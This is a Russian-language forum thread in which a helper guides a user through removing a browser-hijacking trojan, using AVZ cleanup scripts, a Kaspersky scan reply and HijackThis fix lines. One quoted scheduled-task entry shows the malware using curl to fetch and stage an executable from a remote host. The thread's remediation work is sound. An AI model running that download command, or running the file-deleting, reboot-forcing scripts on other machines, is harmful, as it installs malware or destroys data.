Автозапуск браузера

[kulin]

Здравствуйте. Периодически запускается Google Chrome с сайтом. Сканировал несколькими утилитами ничего не помогло. Спасибо за помощь.

[regist]

Порядок оформления запроса о помощи
 

[kulin]

Файл не загрузился с первого раза.

CollectionLog-2017.07.15-13.21.zip

[regist]

c:\users\user\appdata\local\yc\application\yc.exe

Это браузер вам знаком?

Здравствуйте!

 

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

 

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

 

 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\User\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFile('C:\Users\User\Favorites\Links\Интернет.url', '');
 QuarantineFileF('C:\Program Files (x86)\YiuAskIE\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 QuarantineFileF('C:\Users\User\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Users\User\AppData\Roaming\Microsoft\msi.exe', '32');
 DeleteFile('C:\Users\User\Favorites\Links\Интернет.url');
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "2C6A44CB-AD42-4731-A544-3FBD3D83AB5B" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "2C6A44CB-AD42-4731-A544-3FBD3D83AB5B2" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "setupsk" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "setupsk_upd" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "{865447F4-F175-44DC-977C-487DEF38AE59}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "{EF30BB43-1CD0-4EB5-BEED-B1745248C496}" /F', 0, 15000, true);
 DeleteFileMask('C:\Program Files (x86)\YiuAskIE\', '*', true);
 DeleteFileMask('C:\Users\User\AppData\Roaming\curl\', '*', true);
 DeleteDirectory('C:\Users\User\AppData\Roaming\curl\');
 DeleteDirectory('C:\Program Files (x86)\YiuAskIE\');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'hjdqsamhxh');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KLAN)

 

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.

 

• Скачайте AdwCleaner и сохраните его на Рабочем столе.
  
• Запустите его (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  
• Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt.
  
• Прикрепите отчет к своему следующему сообщению.

 

[kulin]

ответ ЛК:

 

KLAN-6529590962

Thank you for contacting Kaspersky Lab
The files have been scanned in automatic mode.

Malicious code has been detected in the following files:
msi.exe - Trojan.Win32.Loskad.fnr

No information about the specified files can be found in the antivirus databases:
Интернет.url
ks5GN.dll
ktr9tIj.dll
t9WlcCyc.dll
Kernel.js
background.js
foreground.js
proxy.js
messages.json
messages_0.json
messages_1.json
messages_2.json
messages_3.json
messages_4.json
messages_5.json
messages_6.json
messages_7.json
messages_8.json
messages_9.json
messages_10.json
messages_11.json
messages_12.json
messages_13.json
messages_14.json
messages_15.json
messages_16.json
messages_17.json
messages_18.json
messages_19.json
messages_20.json
messages_21.json
messages_22.json
messages_23.json
messages_24.json
messages_25.json
messages_26.json
messages_27.json
messages_28.json
messages_29.json
messages_30.json
messages_31.json
messages_32.json
messages_33.json
messages_34.json
messages_35.json
messages_36.json
messages_37.json
messages_38.json
messages_39.json
messages_40.json
messages_41.json
messages_42.json
messages_43.json
messages_44.json
messages_45.json
messages_46.json
messages_47.json
messages_48.json
messages_49.json
messages_50.json
messages_51.json
messages_52.json
messages_53.json
messages_54.json
messages_55.json
messages_56.json
curl_7_54.exe

Adware application designed to display ads was detected in the following files:
mNu8OfaUM.exe - not-a-virus:AdWare.Win32.Neoreklami.fsm

We will thoroughly analyze the files you sent. If the result of the analysis is different from this automatic scan result, you will be notified via email.

This is an automatically generated message. Please do not reply to it.

Anti-Virus Lab, Kaspersky Lab HQ

"39A/3 Leningradskoe Shosse, Moscow, 125212, Russia
Tel./Fax: + 7 (495) 797 8700
http://www.kaspersky.comhttp://www.viruslist.com"

 

 

Изменено 15 июля, 2017 пользователем regist
спрятал под спойлер

[regist]

жду логи.

[kulin]

Логи.

CollectionLog-2017.07.24-20.48.zip

AdwCleanerS0.txt

[regist]

Здравствуйте!

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 TerminateProcessByName('C:\Windows\System32\icacl.exe');
 TerminateProcessByName('c:\users\user\appdata\local\yc\application\yc.exe');
 StopService('icacl');
 QuarantineFile('C:\Windows\System32\icacl.exe', '');
 QuarantineFile('c:\users\user\appdata\local\yc\application\yc.exe', '');
 QuarantineFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome_elf.dll', '');
 QuarantineFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome.dll', '');
 QuarantineFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome_child.dll', '');
 QuarantineFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\libglesv2.dll', '');
 QuarantineFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\libegl.dll', '');
 QuarantineFile('C:\Users\User\AppData\Roaming\curl\curl.exe', '');
 QuarantineFile('C:\Users\User\AppData\Roaming\curl\curl_7_54.exe', '');
 QuarantineFile('C:\Users\User\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFileF('c:\users\user\appdata\local\yc', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0);
 QuarantineFileF('c:\users\user\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0);
 DeleteFile('C:\Windows\System32\icacl.exe', '32');
 DeleteFile('c:\users\user\appdata\local\yc\application\yc.exe', '32');
 DeleteFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome_elf.dll', '32');
 DeleteFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome.dll', '32');
 DeleteFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\chrome_child.dll', '32');
 DeleteFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\libglesv2.dll', '32');
 DeleteFile('C:\Users\User\AppData\Local\yc\Application\56.0.2924.76\libegl.dll', '32');
 DeleteFile('C:\Users\User\AppData\Roaming\curl\curl.exe', '32');
 DeleteFile('C:\Users\User\AppData\Roaming\curl\curl_7_54.exe', '32');
 DeleteFile('C:\Users\User\AppData\Roaming\Microsoft\msi.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 DeleteService('icacl');
 DeleteFileMask('c:\users\user\appdata\local\yc', '*', true);
 DeleteFileMask('c:\users\user\appdata\roaming\curl', '*', true);
 DeleteDirectory('c:\users\user\appdata\roaming\curl');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ycAutoLaunch_E945EC6410C7CE86DF55E29C29AFA8B8');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)

 

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

O2 - BHO: YoutubeAdBlock - {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} - C:\Program Files (x86)\YiuAskIE\t9WlcCyc.dll (file missing)
O2-32 - BHO: YoutubeAdBlock - {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} - C:\Program Files (x86)\YiuAskIE\ktr9tIj.dll (file missing)
O4 - HKCU\..\Run: [ycAutoLaunch_E945EC6410C7CE86DF55E29C29AFA8B8] C:\Users\User\AppData\Local\yc\Application\yc.exe /prefetch:5
O22 - Task (Ready): MSI - C:\Users\User\AppData\Roaming\Microsoft\msi.exe cnt=3 fts="ФИЛЬМЫ\last_day_on_earth_survival_v1_4_2_mod___.exe" (file missing)
O22 - Task (Ready): U2_2C6A44CB-AD42-4731-A544-3FBD3D83AB5B - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\YiuAskU2\EUJHowC.dll",#1
O22 - Task (Ready): curl - C:\Users\User\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\User\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task (Ready): curls - C:\Users\User\AppData\Roaming\curl\curl.exe (file missing)

 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.

[kulin]

Файл quarantine.zip получился размером 48 мб. Не получается его отправить.

Пофиксил в HijackThis.

Прикрепил лог.

CollectionLog-2017.07.25-21.10.zip

Изменено 26 июля, 2017 пользователем kulin

[regist]

 

 

Файл quarantine.zip получился размером 48 мб. Не получается его отправить.

закачайте архив на любой файлообменник, не требующий ввода капчи (например:  Zippyshare, My-Files.RU, File.Karelia) ссылку на скачивание пришлите мне в ЛС.

 

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

var PathAutoLogger, CMDLine : string;

  begin
  clearlog;
  PathAutoLogger := Copy(GetAVZDirectory, 0, (Length(GetAVZDirectory)-4));
  AddToLog('start time ' + FormatDateTime('yyyy.mm.dd-hh:mm:ss', now)+#13#10+ PathAutoLogger);
  SaveLog(PathAutoLogger+'report3.log');
  if FolderIsEmpty(PathAutoLogger+'CrashDumps')
     then CMDLine := 'a "' + PathAutoLogger + 'Report.7z" "' + PathAutoLogger + '\report*.log" "' + PathAutoLogger + 'HiJackThis\HiJackThis*.log"'
     else CMDLine := 'a "' + PathAutoLogger + 'Report.7z" "' + PathAutoLogger + '\report*.log" "' + PathAutoLogger + 'CrashDumps\"';
      ExecuteFile('7za.exe', CMDLine, 0, 180000, false);
  AddLineToTxtFile(PathAutoLogger+'report3.log', '7z ReturnCode ' + IntToStr(GetLastExitCode)+#13#10+'end time ' + FormatDateTime('yyyy.mm.dd-hh:mm:ss', now));
  end.

архив Report.zip из папки с AutoLogger, пожалуйста, прикрепите к своему сообщению. Выполнение скрипта может занять несколько минут. Если архив слишком большой, загрузите его на файлообменник, например на один из этих файлообменников http://rghost.ru/, http://www.zippyshare.com/ , http://my-files.ru/ , http://www.ge.tt/ и дайте на него ссылку в Вашей теме.